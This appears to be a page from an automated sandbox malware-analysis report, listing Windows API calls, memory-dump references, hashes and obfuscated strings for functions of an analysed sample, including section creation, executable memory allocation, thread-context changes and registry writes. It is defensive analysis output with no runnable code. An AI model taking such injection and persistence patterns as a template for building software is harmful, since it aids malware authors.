Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 0040193B

Part of subcall function 0040151A: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D5
Part of subcall function 0040151A: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401602

Memory Dump Source

Source File: 00000007.00000002.2827895541.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_7E95.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 64b01ba4855f7e29543c601e31a9ae0838b9258f53dade71314125a1117efe83
Instruction ID: 5c74587649b894564cef358282e87687984336b0c1a41cd8d34a533d82ace082
Opcode Fuzzy Hash: 64b01ba4855f7e29543c601e31a9ae0838b9258f53dade71314125a1117efe83
Instruction Fuzzy Hash: 1901ADB2204205FAEB005AA49C51E793725AF84714F304233FA13BD0F2C27D8A12EB2F

Function 00A3F64A Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 00A3F69B

Memory Dump Source

Source File: 00000007.00000002.2828537263.0000000000A3C000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A3C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a3c000_7E95.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 3ef41a3ea69900290bbbd78148262503647f639e0ca805db4b171048d85abeb6
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: ED113C79A00208EFDB01DF98CA85E98BBF5AF08350F0580A4F9489B362D371EA50DF80

Function 00401929 Relevance: 1.3, APIs: 1, Instructions: 47sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 0040193B

Part of subcall function 0040151A: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D5
Part of subcall function 0040151A: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401602

Memory Dump Source

Source File: 00000007.00000002.2827895541.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_7E95.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: a0a8a6d31bb91f27d0c6b231cae05e69637896051607562321bb9c617dd814e6
Instruction ID: b0cca15c8a2f1668c504eefccc166d1a869a39e6574cbbe7b6ac3bb4f9ea7934
Opcode Fuzzy Hash: a0a8a6d31bb91f27d0c6b231cae05e69637896051607562321bb9c617dd814e6
Instruction Fuzzy Hash: CDF06DB2248205FAEB006A959C61E7A3725AB84714F304533FA13790F2857D8612EB2F

Non-executed Functions

Function 0041D240 Relevance: 42.3, APIs: 23, Strings: 1, Instructions: 294timethreadfileCOMMON

Download Yara Rule

APIs

GetStringTypeA.KERNEL32(00000000,00000000,00000000,00000000,?), ref: 0041D326
BuildCommDCBW.KERNEL32(00000000,00000000), ref: 0041D32E
GetTimeFormatA.KERNEL32(00000000,00000000,?,0041F3B0,?,00000000), ref: 0041D363
SetThreadAffinityMask.KERNEL32(00000000,00000000), ref: 0041D36B
GetConsoleAliasExesLengthA.KERNEL32 ref: 0041D371
OpenWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 0041D37A
GetProcessHandleCount.KERNEL32(00000000,00000000), ref: 0041D382
GetLocaleInfoA.KERNEL32(00000000,00000000,?,00000000), ref: 0041D390
InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 0041D3D0
GetSystemWindowsDirectoryW.KERNEL32(?,00000000), ref: 0041D3DF
WriteConsoleA.KERNEL32(00000000,?,00000000,?,00000000), ref: 0041D3F2
GetModuleHandleA.KERNEL32(00000000), ref: 0041D3F9
SetThreadContext.KERNEL32(00000000,00000000), ref: 0041D401
FindAtomA.KERNEL32(00000000), ref: 0041D408
SetDefaultCommConfigW.KERNEL32(00000000,?,00000000), ref: 0041D429
GetConsoleAliasW.KERNEL32(00000000,?,00000000,00000000), ref: 0041D43A
MoveFileW.KERNEL32(00000000,00000000), ref: 0041D442
ConnectNamedPipe.KERNEL32(?,00000000), ref: 0041D452
ReadConsoleOutputA.KERNEL32(00000000,?,?,?,?), ref: 0041D487
GetModuleFileNameA.KERNEL32(00000000,?,00000000), ref: 0041D497
OpenFileMappingA.KERNEL32(00000000,00000000,00000000), ref: 0041D4A9
LocalAlloc.KERNEL32(00000000,0080889C), ref: 0041D4BF
QueryMemoryResourceNotification.KERNEL32(00000000,?), ref: 0041D540

Strings

gf@, xrefs: 0041D2BF

Memory Dump Source

Source File: 00000007.00000002.2827930401.0000000000410000.00000020.00000001.01000000.00000006.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_410000_7E95.jbxd

Similarity

API ID: Console$File$AliasCommHandleModuleOpenThread$AffinityAllocAtomBuildCompareConfigConnectContextCountDefaultDirectoryExchangeExesFindFormatInfoInterlockedLengthLocalLocaleMappingMaskMemoryMoveNameNamedNotificationOutputPipeProcessQueryReadResourceStringSystemTimeTimerTypeWaitableWindowsWrite
String ID: gf@
API String ID: 2514727072-4154624262
Opcode ID: 0ba5b5f047ba029ddcdf298e58d75a131cb95a39818ad51f03d4afb26bad6555
Instruction ID: 8a1d21a96cce7193dfe34e1f32284ac7be4b5c90a43d68034c0f8cb0ec7ffe7d
Opcode Fuzzy Hash: 0ba5b5f047ba029ddcdf298e58d75a131cb95a39818ad51f03d4afb26bad6555
Instruction Fuzzy Hash: 0AA186F5904310AFD314EF65DCC4DABB7ADFB8C304F40893EFA8A92151D67899448B69

Function 0041D080 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 77registryCOMMON

Download Yara Rule

APIs

GetComputerNameA.KERNEL32(?,?), ref: 0041D121
SetCalendarInfoA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0041D12F
OpenJobObjectW.KERNEL32(00000000,00000000,0041F350), ref: 0041D13E
GetShortPathNameW.KERNEL32(00000000,?,00000000), ref: 0041D150
RegCreateKeyA.ADVAPI32(00000000,0041F390,?), ref: 0041D15E

Strings

-, xrefs: 0041D170
F, xrefs: 0041D0E5

Memory Dump Source

Source File: 00000007.00000002.2827930401.0000000000410000.00000020.00000001.01000000.00000006.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_410000_7E95.jbxd

Similarity

API ID: Name$CalendarComputerCreateInfoObjectOpenPathShort
String ID: -$F
API String ID: 808174175-2709719458
Opcode ID: 6c9142031a2b5ed9112e9414d317d5773860ad35b8d33efb7404191363ddea47
Instruction ID: fe56c437a454ea6c5f795bae894c8cd01d7ae09f61aea23a1609d43891937794
Opcode Fuzzy Hash: 6c9142031a2b5ed9112e9414d317d5773860ad35b8d33efb7404191363ddea47
Instruction Fuzzy Hash: 0731D5B5508341AFE320DF24DC41B9BBBE0BF88715F00492DF6989B191CB749589CB6B

Analysis Process: wrhivcvPID: 4048, Parent PID: 1044COMMON

Execution Graph

Execution Coverage:	0.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	6%
Total number of Nodes:	1389
Total number of Limit Nodes:	0

Executed Functions

Function 00401AA1 Relevance: 1.5, APIs: 1, Instructions: 20
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000,?,004017FB,00000001), ref: 00401AB6

Memory Dump Source

Source File: 00000008.00000002.4108711592.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.4108681419.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.4108711592.0000000000410000.00000020.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.4108782620.000000000041E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.4108816560.0000000000421000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.4108939739.0000000000811000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_wrhivcv.jbxd

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 81423c53bcf223335a8a5a01acbd3d0262ac62c925a4c43787b7a2d8bdd82cbc
Instruction ID: 07a39966237af4d6a9052165e94da5087581865f49a7008b570ba4105093ac5e
Opcode Fuzzy Hash: 81423c53bcf223335a8a5a01acbd3d0262ac62c925a4c43787b7a2d8bdd82cbc
Instruction Fuzzy Hash: 43D05E3A654384AEDB109FB17C187623BDCE7843A5F048436FD0CC6190E6B4D540DA04

Non-executed Functions

Function 0041D240 Relevance: 65.0, APIs: 35, Strings: 2, Instructions: 294
timethreadfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLogicalDriveStringsA.KERNEL32(00000000,00000000), ref: 0041D2D0
GetLastError.KERNEL32(?,?,00000001,?,0041D615,0040189B,00400000,?,00000000,0000000A), ref: 0041D2F0
GetStringTypeExA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000001,?,0041D615,0040189B,00400000,?,00000000,0000000A), ref: 0041D326
BuildCommDCBW.KERNEL32(00000000,00000000), ref: 0041D32E
GetTimeFormatA.KERNEL32(00000000,00000000,?,wukevuvitevasegexolij,?,00000000,?,?,00000001,?,0041D615,0040189B,00400000,?,00000000,0000000A), ref: 0041D363
SetThreadAffinityMask.KERNEL32(00000000,00000000), ref: 0041D36B
GetConsoleAliasExesLengthA.KERNEL32(?,?,00000001,?,0041D615,0040189B,00400000,?,00000000,0000000A), ref: 0041D371
OpenWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 0041D37A
GetProcessHandleCount.KERNEL32(00000000,00000000,?,?,00000001,?,0041D615,0040189B,00400000,?,00000000,0000000A), ref: 0041D382
GetLocaleInfoA.KERNEL32(00000000,00000000,?,00000000,?,?,00000001,?,0041D615,0040189B,00400000,?,00000000,0000000A), ref: 0041D390
_calloc.LIBCMT ref: 0041D398
_realloc.LIBCMT ref: 0041D39F
_malloc.LIBCMT ref: 0041D3A5
_calloc.LIBCMT ref: 0041D3B2
InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 0041D3D0
GetSystemWindowsDirectoryW.KERNEL32(?,00000000), ref: 0041D3DF
WriteConsoleA.KERNEL32(00000000,?,00000000,?,00000000,?,?,00000001,?,0041D615,0040189B,00400000,?,00000000,0000000A), ref: 0041D3F2
GetModuleHandleA.KERNEL32(00000000,?,?,00000001,?,0041D615,0040189B,00400000,?,00000000,0000000A), ref: 0041D3F9
SetThreadContext.KERNEL32(00000000,00000000,?,?,00000001,?,0041D615,0040189B,00400000,?,00000000,0000000A), ref: 0041D401
FindAtomA.KERNEL32(00000000,?,?,00000001,?,0041D615,0040189B,00400000,?,00000000,0000000A), ref: 0041D408
_memset.LIBCMT ref: 0041D41A
SetDefaultCommConfigW.KERNEL32(00000000,?,00000000), ref: 0041D429
GetConsoleAliasW.KERNEL32(00000000,?,00000000,00000000), ref: 0041D43A
MoveFileW.KERNEL32(00000000,00000000), ref: 0041D442
ConnectNamedPipe.KERNEL32(?,00000000), ref: 0041D452
ReadConsoleOutputA.KERNEL32(00000000,?,?,?,?), ref: 0041D487
GetModuleFileNameA.KERNEL32(00000000,?,00000000), ref: 0041D497
OpenFileMappingA.KERNEL32(00000000,00000000,00000000), ref: 0041D4A9
LocalAlloc.KERNEL32(00000000,?,?,?,00000001,?,0041D615,0040189B,00400000,?,00000000,0000000A), ref: 0041D4BF
QueryMemoryResourceNotification.KERNEL32(00000000,?,?,?,00000001,?,0041D615,0040189B,00400000,?,00000000,0000000A), ref: 0041D540
InterlockedDecrement.KERNEL32(?), ref: 0041D561
GetSystemTime.KERNEL32(00000000,?,?,00000001,?,0041D615,0040189B,00400000,?,00000000,0000000A), ref: 0041D565
WriteConsoleOutputCharacterA.KERNEL32(00000000,00000000,00000000,?,?,?,?,00000001,?,0041D615,0040189B,00400000,?,00000000,0000000A), ref: 0041D5AD
GetMonitorInfoA.USER32(00000000,?), ref: 0041D5C9
GetClassLongW.USER32(00000000,00000000), ref: 0041D5CF

Strings

gf@, xrefs: 0041D2BF
wukevuvitevasegexolij, xrefs: 0041D350

Memory Dump Source

Source File: 00000008.00000002.4108711592.0000000000410000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.4108681419.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.4108711592.0000000000401000.00000020.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.4108782620.000000000041E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.4108816560.0000000000421000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.4108939739.0000000000811000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_wrhivcv.jbxd

Similarity

API ID: Console$File$AliasCommHandleInfoInterlockedModuleOpenOutputSystemThreadTimeWrite_calloc$AffinityAllocAtomBuildCharacterClassCompareConfigConnectContextCountDecrementDefaultDirectoryDriveErrorExchangeExesFindFormatLastLengthLocalLocaleLogicalLongMappingMaskMemoryMonitorMoveNameNamedNotificationPipeProcessQueryReadResourceStringStringsTimerTypeWaitableWindows_malloc_memset_realloc
String ID: gf@$wukevuvitevasegexolij
API String ID: 1141306345-3314859582
Opcode ID: 280fed795450e6cf43a57fb04f0211233d1be7e5dc6e0c5da7eed8d676b77ee5
Instruction ID: 8a1d21a96cce7193dfe34e1f32284ac7be4b5c90a43d68034c0f8cb0ec7ffe7d
Opcode Fuzzy Hash: 280fed795450e6cf43a57fb04f0211233d1be7e5dc6e0c5da7eed8d676b77ee5
Instruction Fuzzy Hash: 0AA186F5904310AFD314EF65DCC4DABB7ADFB8C304F40893EFA8A92151D67899448B69

Function 00401000 Relevance: 7.6, APIs: 5, Instructions: 58
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

IsDebuggerPresent.KERNEL32 ref: 004019CB
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004019E0
UnhandledExceptionFilter.KERNEL32(0041E210), ref: 004019EB
GetCurrentProcess.KERNEL32(C0000409), ref: 00401A07
TerminateProcess.KERNEL32(00000000), ref: 00401A0E

Memory Dump Source

Source File: 00000008.00000002.4108711592.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.4108681419.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.4108711592.0000000000410000.00000020.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.4108782620.000000000041E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.4108816560.0000000000421000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.4108939739.0000000000811000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_wrhivcv.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: a3decc1e2d959d77aeef3e4d151effea3e88d6240263e92642c303f3ead41042
Instruction ID: 8d619fc2e9feb429aca73b3b3af3f0c94763e6e31c998104a1bdcd398ad80466
Opcode Fuzzy Hash: a3decc1e2d959d77aeef3e4d151effea3e88d6240263e92642c303f3ead41042
Instruction Fuzzy Hash: 6921FEB8A01214FFD720EF25EE596443BA0BB08305F80847AE80883271E7F459C6CF4E

Function 00404569 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00004527), ref: 0040456E

Memory Dump Source

Source File: 00000008.00000002.4108711592.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.4108681419.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.4108711592.0000000000410000.00000020.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.4108782620.000000000041E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.4108816560.0000000000421000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.4108939739.0000000000811000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_wrhivcv.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 78a2c6a9ea6f1cfaa1c523ba0e549da21e5636f86bfb3241a8b3b6b434e00ed9
Instruction ID: 232c140a11f348f4d5467bc6badb53eb9641eddd93f39b549b65abb8a794f404
Opcode Fuzzy Hash: 78a2c6a9ea6f1cfaa1c523ba0e549da21e5636f86bfb3241a8b3b6b434e00ed9
Instruction Fuzzy Hash: 109002F465111157864057715E0968929916E9D6037564472A701D4494DEB48000571A

Function 0041D080 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 77
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNumaNodeProcessorMask.KERNEL32(00000000,00000000), ref: 0041D115
GetComputerNameA.KERNEL32(?,?), ref: 0041D121
SetCalendarInfoA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0041D12F
OpenJobObjectW.KERNEL32(00000000,00000000,poxifuyubucicoyiruholefabofukup), ref: 0041D13E
GetShortPathNameW.KERNEL32(00000000,?,00000000), ref: 0041D150
RegCreateKeyA.ADVAPI32(00000000,veratupamolowubifizetoxeduzi,?), ref: 0041D15E

Strings

poxifuyubucicoyiruholefabofukup, xrefs: 0041D135
F, xrefs: 0041D0E5
veratupamolowubifizetoxeduzi, xrefs: 0041D157
-, xrefs: 0041D170

Memory Dump Source

Source File: 00000008.00000002.4108711592.0000000000410000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.4108681419.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.4108711592.0000000000401000.00000020.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.4108782620.000000000041E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.4108816560.0000000000421000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.4108939739.0000000000811000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_wrhivcv.jbxd

Similarity

API ID: Name$CalendarComputerCreateInfoMaskNodeNumaObjectOpenPathProcessorShort
String ID: -$F$poxifuyubucicoyiruholefabofukup$veratupamolowubifizetoxeduzi
API String ID: 2862003782-1483585335
Opcode ID: a1c2a5110e650699430a41c18db84162bda0643848e89e094de4ff4143130b16
Instruction ID: fe56c437a454ea6c5f795bae894c8cd01d7ae09f61aea23a1609d43891937794
Opcode Fuzzy Hash: a1c2a5110e650699430a41c18db84162bda0643848e89e094de4ff4143130b16
Instruction Fuzzy Hash: 0731D5B5508341AFE320DF24DC41B9BBBE0BF88715F00492DF6989B191CB749589CB6B

Function 0041D4E6 Relevance: 9.1, APIs: 6, Instructions: 83
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

QueryMemoryResourceNotification.KERNEL32(00000000,?,?,?,00000001,?,0041D615,0040189B,00400000,?,00000000,0000000A), ref: 0041D540
InterlockedDecrement.KERNEL32(?), ref: 0041D561
GetSystemTime.KERNEL32(00000000,?,?,00000001,?,0041D615,0040189B,00400000,?,00000000,0000000A), ref: 0041D565
WriteConsoleOutputCharacterA.KERNEL32(00000000,00000000,00000000,?,?,?,?,00000001,?,0041D615,0040189B,00400000,?,00000000,0000000A), ref: 0041D5AD
GetMonitorInfoA.USER32(00000000,?), ref: 0041D5C9
GetClassLongW.USER32(00000000,00000000), ref: 0041D5CF

Memory Dump Source

Source File: 00000008.00000002.4108711592.0000000000410000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.4108681419.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.4108711592.0000000000401000.00000020.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.4108782620.000000000041E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.4108816560.0000000000421000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.4108939739.0000000000811000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_wrhivcv.jbxd

Similarity

API ID: CharacterClassConsoleDecrementInfoInterlockedLongMemoryMonitorNotificationOutputQueryResourceSystemTimeWrite
String ID:
API String ID: 3946633259-0
Opcode ID: 7e59e35649b4e3531b9c362b26030efc782f5ad58305feb91430bf0b98d4c1fd
Instruction ID: 9b26e32d6c9af59d5edcbb57e1d6281186450faf621e80aed0b5edbb5270efb7
Opcode Fuzzy Hash: 7e59e35649b4e3531b9c362b26030efc782f5ad58305feb91430bf0b98d4c1fd
Instruction Fuzzy Hash: F4213FB1D44320ABD710EF21DC817FBB766EBC4319F01843FEA8957251D6749885CB9A

Function 00405926 Relevance: 7.5, APIs: 5, Instructions: 47
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__getptd.LIBCMT ref: 00405932

Part of subcall function 00403B0C: __getptd_noexit.LIBCMT ref: 00403B0F
Part of subcall function 00403B0C: __amsg_exit.LIBCMT ref: 00403B1C

__amsg_exit.LIBCMT ref: 00405952
__lock.LIBCMT ref: 00405962
InterlockedDecrement.KERNEL32(?), ref: 0040597F
InterlockedIncrement.KERNEL32(024215E8), ref: 004059AA

Memory Dump Source

Source File: 00000008.00000002.4108711592.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.4108681419.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.4108711592.0000000000410000.00000020.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.4108782620.000000000041E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.4108816560.0000000000421000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.4108939739.0000000000811000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_wrhivcv.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
String ID:
API String ID: 4271482742-0
Opcode ID: 2334e6e84ce0b42b690fe5780ade924161e65792cc76af17c00e281526f9b2d3
Instruction ID: fc649b866828fe3a6aba54610b1f40b8dfe1b0acd1da268b3fb110b1647a0daf
Opcode Fuzzy Hash: 2334e6e84ce0b42b690fe5780ade924161e65792cc76af17c00e281526f9b2d3
Instruction Fuzzy Hash: 0A018E71A40A11DBDB21AB66980979F7B60EB10B35F55003BE804B72E1C73CA981DFDD

Function 0040100F Relevance: 7.5, APIs: 5, Instructions: 44
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__lock.LIBCMT ref: 0040102D

Part of subcall function 00401C4D: __mtinitlocknum.LIBCMT ref: 00401C63
Part of subcall function 00401C4D: __amsg_exit.LIBCMT ref: 00401C6F
Part of subcall function 00401C4D: EnterCriticalSection.KERNEL32(?,?,?,004029AD,00000004,0041F518,0000000C,00404B39,?,?,00000000,00000000,00000000,?,00403ABE,00000001), ref: 00401C77

___sbh_find_block.LIBCMT ref: 00401038
___sbh_free_block.LIBCMT ref: 00401047
HeapFree.KERNEL32(00000000,?,0041F450,0000000C), ref: 00401077
GetLastError.KERNEL32(?,?,?,?,?,?,0041F450,0000000C), ref: 00401088

Memory Dump Source

Source File: 00000008.00000002.4108711592.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.4108681419.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.4108711592.0000000000410000.00000020.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.4108782620.000000000041E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.4108816560.0000000000421000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.4108939739.0000000000811000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_wrhivcv.jbxd

Similarity

API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2714421763-0
Opcode ID: 1039cfc2e9dda4ef8c9d4e03381705279fe03aa5f85df280bf8ab46b54df8bc0
Instruction ID: 988edd08e37cd61ce53c6d0e9f96b3e1d6c6ed8ef8af97b43e7782474a441300
Opcode Fuzzy Hash: 1039cfc2e9dda4ef8c9d4e03381705279fe03aa5f85df280bf8ab46b54df8bc0
Instruction Fuzzy Hash: 23018F36905355AAEB307B729D0AB6E7A60AF00364F10013BF944B61E1CB7C85809A5C

Function 00406092 Relevance: 6.0, APIs: 4, Instructions: 31
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__getptd.LIBCMT ref: 0040609E

Part of subcall function 00403B0C: __getptd_noexit.LIBCMT ref: 00403B0F
Part of subcall function 00403B0C: __amsg_exit.LIBCMT ref: 00403B1C

__getptd.LIBCMT ref: 004060B5
__amsg_exit.LIBCMT ref: 004060C3
__lock.LIBCMT ref: 004060D3

Memory Dump Source

Source File: 00000008.00000002.4108711592.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.4108681419.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.4108711592.0000000000410000.00000020.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.4108782620.000000000041E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.4108816560.0000000000421000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.4108939739.0000000000811000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_wrhivcv.jbxd

Similarity

API ID: __amsg_exit__getptd$__getptd_noexit__lock
String ID:
API String ID: 3521780317-0
Opcode ID: 3d025a6189105e816e7cb29012810986e919689c1c9670e9d6ba45538167e867
Instruction ID: b9ba030beaf64d2d4ed9023fdcda3ac5684e9ec3b6ee0e507fccbd8e021dfb13
Opcode Fuzzy Hash: 3d025a6189105e816e7cb29012810986e919689c1c9670e9d6ba45538167e867
Instruction Fuzzy Hash: 60F09631580700CBD720FB65840675977A06F00719F11427FE456772E2CF7C9941CB5D

Function 004045FE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_strlen.LIBCMT ref: 00404600
__calloc_crt.LIBCMT ref: 00404614

Part of subcall function 00404B23: __calloc_impl.LIBCMT ref: 00404B34
Part of subcall function 00404B23: Sleep.KERNEL32(00000000), ref: 00404B4B

Part of subcall function 0040100F: __lock.LIBCMT ref: 0040102D
Part of subcall function 0040100F: ___sbh_find_block.LIBCMT ref: 00401038
Part of subcall function 0040100F: ___sbh_free_block.LIBCMT ref: 00401047
Part of subcall function 0040100F: HeapFree.KERNEL32(00000000,?,0041F450,0000000C), ref: 00401077
Part of subcall function 0040100F: GetLastError.KERNEL32(?,?,?,?,?,?,0041F450,0000000C), ref: 00401088

Strings

SBVZ, xrefs: 0040462D

Memory Dump Source

Source File: 00000008.00000002.4108711592.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.4108681419.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.4108711592.0000000000410000.00000020.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.4108782620.000000000041E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.4108816560.0000000000421000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.4108939739.0000000000811000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_wrhivcv.jbxd

Similarity

API ID: ErrorFreeHeapLastSleep___sbh_find_block___sbh_free_block__calloc_crt__calloc_impl__lock_strlen
String ID: SBVZ
API String ID: 532356523-2208937303
Opcode ID: 7d28ec94137dcd6976ef9e998599681cbf25327a8c7c3c615f8855b4b90ceacd
Instruction ID: 1550c57b97eade3475a04f2b8259fddb2368067d36167e4da6f57c3b37365fe9
Opcode Fuzzy Hash: 7d28ec94137dcd6976ef9e998599681cbf25327a8c7c3c615f8855b4b90ceacd
